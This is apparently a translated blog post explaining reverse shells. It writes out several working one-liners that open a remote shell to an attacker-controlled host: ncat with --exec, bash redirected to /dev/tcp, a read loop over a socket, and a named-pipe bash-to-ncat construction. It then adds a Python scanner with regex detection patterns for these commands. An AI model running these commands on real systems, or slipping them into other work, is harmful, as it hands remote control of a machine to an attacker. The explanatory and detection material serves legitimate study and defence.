A reverse shell: the attacker's machine (the local host) listens on some TCP/UDP port, the victim (the target server) initiates a connection to that port and redirects the input and output of its command line to the controlling end. Compared with standard shells such as telnet and ssh, a reverse shell is essentially a reversal of the network client and server roles.
ncat:
attacker
ncat --listen --source-port 5555 --keep-open
victim
ncat --exec /bin/bash IP 5555
bash -i >& /dev/tcp/intrinsic/5555 0<&1
This snippet runs a new interactive instance of bash (bash -i) over a TCP connection to the specified port on the specified host; the connection exists for the duration of the bash process. Standard output and standard error are sent through this connection (>& /dev/tcp/HOST/PORT), and standard input is read through the same connection (0>&1). Note: this should be 0<&1, but 0>&1 works too.
echo b c > /dev/tcp/HOST/PORT
exec 5<> /dev/tcp/HOST/PORT
cat <&5 | while read line; do $line >&5 2>&1; done
file=$(mktemp --dry-run -p /tmp --suffix .pipe tmp.XXX)
mkfifo --mode=700 "$file"
cat "$file" | bash -i 2>&1 | ncat HOST PORT > "$file"
cat feeds the content of the named pipe to bash, bash executes it, and ncat writes the output back into the same pipe.
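From the defender's side, the constructions above leave recognisable traces in a feed of executed command lines (auditd execve records, shell history, EDR process telemetry). The following Python scanner is an added example, not part of the original post; the one-command-per-line log format, the sample lines and the regular expressions are my own assumptions, not a vendor ruleset.

```python
import re
from typing import List, Tuple

# Indicators for the reverse-shell constructions discussed on this page.
# The regexes are approximations written for this example, not a vendor ruleset.
INDICATORS = {
    # bash -i >& /dev/tcp/HOST/PORT, exec 5<>/dev/tcp/HOST/PORT, echo x > /dev/tcp/HOST/PORT:
    # a redirection operator immediately followed by a /dev/tcp or /dev/udp pseudo-path.
    "dev_tcp_redirect": re.compile(r"[<>&]\s*/dev/(?:tcp|udp)/[^/\s]+/\d+"),
    # ncat/nc asked to attach a program to the socket (--exec, --sh-exec or -e).
    # Limitation: a later unrelated "-e" on a line that also mentions nc would match.
    "ncat_exec": re.compile(r"\bn(?:cat|c)\b.*\s(?:-e|--exec|--sh-exec)\s"),
    # cat FIFO | bash ... | ncat HOST PORT > FIFO: the same path is read by cat
    # and written by ncat, with a shell in between (backreference \1 enforces the reuse).
    "fifo_shell_pipe": re.compile(
        r"\bcat\s+(\S+)\s*\|\s*(?:bash|sh)\b.*\|\s*\bn(?:cat|c)\b.*>\s*\1\b"
    ),
}

# Constructed sample feed: one executed command per line. 198.51.100.7 is a
# documentation-range address chosen for the example, and the fifo path is made up.
SAMPLE_LOG = [
    "bash -i >& /dev/tcp/198.51.100.7/5555 0<&1",
    "echo b c > /dev/tcp/198.51.100.7/5555",
    "exec 5<>/dev/tcp/198.51.100.7/5555",
    "ncat --exec /bin/bash 198.51.100.7 5555",
    "cat /tmp/tmp.abc.pipe | bash -i 2>&1 | ncat 198.51.100.7 5555 > /tmp/tmp.abc.pipe",
    "cat /var/log/syslog | grep -i tcp",      # benign: pipe into grep, no shell, no socket
    "nc -zv 198.51.100.7 80",                 # benign: connectivity check, no -e/--exec
]


def scan_commands(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, indicator name) for every indicator that fires.

    A line may produce several tuples if more than one indicator matches it.
    """
    hits: List[Tuple[int, str]] = []
    for lineno, line in enumerate(lines, start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.append((lineno, name))
    return hits


if __name__ == "__main__":
    for lineno, name in scan_commands(SAMPLE_LOG):
        print(f"line {lineno}: {name}: {SAMPLE_LOG[lineno - 1]}")
```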
From: https://www.cnblogs.com/dissipate/p/17085694.html